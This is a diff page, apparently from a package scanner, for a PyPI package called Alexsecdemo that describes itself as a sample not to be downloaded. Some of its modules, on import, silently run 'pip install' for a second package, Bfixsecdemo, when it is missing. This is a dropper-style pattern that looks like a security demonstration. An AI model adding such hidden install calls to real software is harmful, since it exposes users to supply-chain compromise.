alexsecdemo
Advanced tools
| import imp | ||
| import os | ||
| modules = set(["Bfixsecdemo"]) | ||
| for m in modules: | ||
| try: | ||
| imp.find_module(m) | ||
| except ImportError: | ||
| os.system("pip install Bfixsecdemo") | ||
| def prtunit(): | ||
| print('i am Alex.prtunit!') |
| def prtmymod2(): | ||
| print('i am Alex.prtmymod2!') |
| Metadata-Version: 2.1 | ||
| Name: Alexsecdemo | ||
| Version: 1.3.4 | ||
| Version: 5.2.9 | ||
| Summary: A sample Python project, do not download it! | ||
@@ -5,0 +5,0 @@ Author: Alex |
@@ -7,5 +7,5 @@ Alexsecdemoraw.py | ||
| Alexsecdemo.egg-info/top_level.txt | ||
| mymod1/__init__.py | ||
| mymod1/unit.py | ||
| mymod2/__init__.py | ||
| mymod2/mymod2.py | ||
| a-b/__init__.py | ||
| a-b/mymod2.py | ||
| a_b/__init__.py | ||
| a_b/unit.py |
| Alexsecdemoraw | ||
| mymod1 | ||
| mymod2 | ||
| a-b | ||
| a_b |
+1
-1
| Metadata-Version: 2.1 | ||
| Name: Alexsecdemo | ||
| Version: 1.3.4 | ||
| Version: 5.2.9 | ||
| Summary: A sample Python project, do not download it! | ||
@@ -5,0 +5,0 @@ Author: Alex |
+2
-2
@@ -16,7 +16,7 @@ from setuptools import setup | ||
| name='Alexsecdemo', #package name | ||
| version='1.3.4', | ||
| version='5.2.9', | ||
| description='A sample Python project, do not download it!', | ||
| author='Alex', | ||
| license='MIT', | ||
| packages=['mymod1','mymod2'], | ||
| packages=['a_b','a-b'], | ||
| py_modules=['Alexsecdemoraw'], | ||
@@ -23,0 +23,0 @@ cmdclass={'install': CustomInstall}, |
| import imp | ||
| import os | ||
| modules = set(["Bfixsecdemo"]) | ||
| for m in modules: | ||
| try: | ||
| imp.find_module(m) | ||
| except ImportError: | ||
| os.system("pip install Bfixsecdemo") | ||
| def prtunit(): | ||
| print('i am Alex.prtunit!') |
| def prtmymod2(): | ||
| print('i am Alex.prtmymod2!') |
Alert delta unavailable
Currently unable to show alert delta for PyPI packages.
1660
-1.43%